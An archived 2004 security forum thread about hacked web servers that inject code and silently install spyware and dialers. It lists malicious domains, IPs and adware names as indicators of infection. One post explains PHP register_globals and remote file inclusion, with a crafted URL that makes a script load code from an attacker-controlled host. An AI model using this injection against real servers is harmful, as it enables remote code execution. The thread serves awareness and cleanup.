BleepingComputer.com > World Wide Explot via servers

Full Version: World Wide Explot via servers

BleepingComputer.com > Security > Breaking Virus & Security News

TeMerc

Nov 20 2004, 01:31 PM

From DSLR, by Eric Howes:

QUOTE

Hi All:

Some of you may have seen one of today's new stories about a stealth installation exploit that Ben Edelman wrote up and published on his web site:

»www.benedelman.org/news/111804-1.html

Included with Ben's write-up is an eye-opening video. Ben's web site is down at the moment, unfortunately -- too much traffic. Edit: see Ben's post below -- his site is back up.

I thought you all might like some additional information about the exploit that Ben documented.

This is a developing story and our information is still incomplete, so the information presented here may need to be revised in the light of new developments.

It appears that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2bleeped.biz
splitinfinity.info
xpire.info

Those pages use several security exploits to stealth install a variety of different software packages on users' PCs, all without any warning whatsoever. Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.

The software installed on users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed, as in Ben's test. The packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

The screenshot included with this post comes from the video that Ben made, and it gives a sense for the great variety of junk that can be installed.

We have started seeing evidence of this exploit in victims' HJT logs at several anti-spyware forums -- a few samples:

»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»castlecops.com/postlite85832-sp2bleeped..
»castlecops.com/postlite86439-sp2bleeped..
»castlecops.com/postlite86459-sp2bleeped..
»castlecops.com/postlite87626-sp2bleeped..
»computercops.biz/postp364469.html
»computercops.biz/postp364553.html
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forum.aumha.org/viewtopic.php?t=9340
»www.trojaner-board.de/archive/index.ph..

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

»www.gossamer-threads.com/lists/fulldis..
»seclists.org/lists/fulldisclosure/2004..

Wayne Porter has some interesting comments on this exploit:

»www.revenews.com/wayneporter/archives/..

I might add that I stumbled upon this because of a post by Andrew Clover (of doxdesk.com fame) in response to the Aluria/WhenU controversy:

»www.aluriasoftware.com/forum/thread351..

In closing, I should note that the latest updates for IE-SPYAD and AGNIS (released last night) include all of the key domains documented here.

I'll be posting with more information as it becomes available.

Best,

Eric L. Howes

Everyone needs to read this thread and spread the word about.
http://www.broadbandreports.com/forum/rema...04374~mode=flat

Grinler

Nov 21 2004, 08:31 PM

Good read.

It seems they are breaking in possibly through register_global variable injections in php. For those who do not understand programming, I will try to explain it in such a way that it is easy to understand and is simplified.

PHP, which is a popular programming language for dynamic websites, contains a setting called register_globals. In the newer versions of PHP this setting is set to off, though many people still use it. If you are using an older version, pre 4.2.0, this will be on by default. In this contest, register_variables will take a form variable and automatically make it a variable in the PHP program. This means that anyone could create a valid variable, even overwriting existing ones in the program, via properly formed urls.

For example the following GET url can be used to create two variables in a program called $badsite and $evilprogram.

Lets say I had a program called test.php and it resided on testdomain.com.

If i crafted an url like this:

http:://www.testdomain.com/test.php?badsite=http:://www.examplesite.com&evilprogram=infection.php

and went to it in a browser. The test.php program would run and create two variables called $badsite and make it equal to http:://www.examplesite.com and another variable called $evilprogram and make that equal to infection.php.

For most cases this does not matter as the hacker does not know your variables that you used in your program. The problem arises when the exploiter knows the program that you are running. Remember when I said that you can overwrite variables in a php program by using an url like the one above. Now what if you were running an open source program that the source code was readily available. Now anyone in the world would know the code and the variables being used. Now if your server is using the register_variables and has it set to on, a user could overwrite your variables with data of their choice. In some cases they can use this method to change the behaviour of your program.

What if though they could use this method to run any code they wanted on your machine. Literally any code. This can be done if the program uses an include statement with a variable in it. An include statement simply allows you to include code from a file located on your computer or off it into the running program. This contents of the included file will add its code to the original program.

Lets say you had some code like this:

include("$include/function.php");

If you do not set the $include variable to something specific then i can craft an url that looks like this:

http:://www.testdomain.com/test.php?include=http:://www.examplesite.com

Now when the test.php program is run it will include the function.php program from the following site:

http:://www.examplesite.com/function.php.

As the site examplesite.com is under your control, you can put whatever code you want into the function.php residing there. That code can do anything from adding users to the machines, giving you more access, or deleting files.

As you can see this is some scary stuff.

I hope this makes sense and gives you a glimpse into how these people work and can do what they do.

phawgg

Nov 21 2004, 08:50 PM

Sites not to visit are certainly clear enough...and a solid endorsement of the effectiveness of IE-SPYAD, too. I'm still a bit cloudy regarding the programming, but that was a darn good effort, Grinler. Thanks to both you & TeMerc for being concerned about the welbeing and undersatnding of the "basic-user" like me.

TeMerc

Nov 22 2004, 02:08 AM

Just a quick update.

We have been working all weekend with several security experts from Panda and MS on this exploit, or, it seems to be 2 exploits.

The craftyness of these guys is deeper than originally thought to be. There still is no clear reason for why its being done just yet.

The FTC has been alerted to the problem, as has SANS. We have tracked several servers down infected, and contacted the admin at said servers. A UK news site got hit with it too:
http://www.theregister.co.uk/2004/11/21/re...dserver_attack/

We have also gathered lots of other important documentaion to try and find the people behind this, but its extremely difficult. The best thing we an do, is to warn everyone we know about the potential for a problem.

Wish I could elaborate more, but thats enough for now.

Grinler

Nov 22 2004, 08:34 AM

Just so everyone knows, I am now caught up with the situation that TeMerc is referring to and its quite nasty. As more information is released to the public we will tell you about it here.

It does not seem that they are using the hack as described above but two other exploits. Let you know more as its released.

Tweener

Nov 26 2004, 01:47 PM

I believe I am a victim of this. If I can be of any help to your research, please let me know. I have been unsucceful at my attempts to clean the system. A step by step effort is documented here: http://www.bleepingcomputer.com/forums/topic5508.html .

TeMerc

Nov 26 2004, 02:04 PM

ACtually, I do not think you are a victim of this exploit. If you were, you would have some of the items listed in the orginal thread, such as:
180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

Nor do you have any of these in your
sp2bleeped.biz
splitinfinity.info
xpire.info

Those are the major indicators of the infection.
You seem to have just some regular, run of the mill malware, altho, its annoyiing just the same.

Tweener

Nov 26 2004, 03:58 PM

Yes, many of these were present early in the infection. After I disconnected from my router, I cleaned them with Adaware and Spybot S&D before running HJT. A few that I remember for sure were:

180solutions
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
TIB Browser
WebRebates (TopMoxie)

In addition there was

Virtual Bouncer

The infection ran in a fashion very similar to the video recording on http://www.benedelman.org/news/111804-1.html . I saw some of the exact
same windows and promts. But since I pulled the plug (literally!) as soon as what was happening became apparent, not all the adware that probably would have been installed was installed.

An interesting note is that by entering safe mode with all files viewable, I have run a search for files created during the exact time period of the beginning of the infection. Since no other solution has worked, I deleted all files created in those two minutes, but am holding them in my recycle bin for the time being. If the infection seems to have been halted (no more unprompted installations), I will make these files available for you all to study. There were multiple .exe and .dll files in this list.

KoanYorel

Nov 26 2004, 04:08 PM

Good for you Tweener, on keeping track of what was happening with your system!

Should you forward these files onward, please, ensure that you only send them
in a "Zipped" file to preclude infecting the receipents.

I'm sure there will be several members that will request that you forward those
files to them for further study.

regards,
~Koan

Tweener

Nov 26 2004, 07:23 PM

Update: Over three hours now and no sign of the infection left. I ran the Trend Micro Housecall online scan and it identified 9 of the files I removed from the Windows and System folders as trojans or backdoors, including one key logger! I changed my router password from this computer because of that just to be safe even though remote admin is disabled. Two others were identified as well, so I moved them to the same folder where the others are contained. Adaware is only detecting tracking cookies again, and Spybot S&D only buggily detects the DSO exploit. Think I'll stick with Netscape from now on.

KoanYorel

Nov 26 2004, 07:44 PM

You might also explore Firefox or Mozzila as an other alternative.

I have several browsers I use. Mainly Firfox now.

(BTW - Acquaintances of mine that use "netscape" have been having probems
similiar to those who continue to use "IE"!)

regards,
~Koan

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.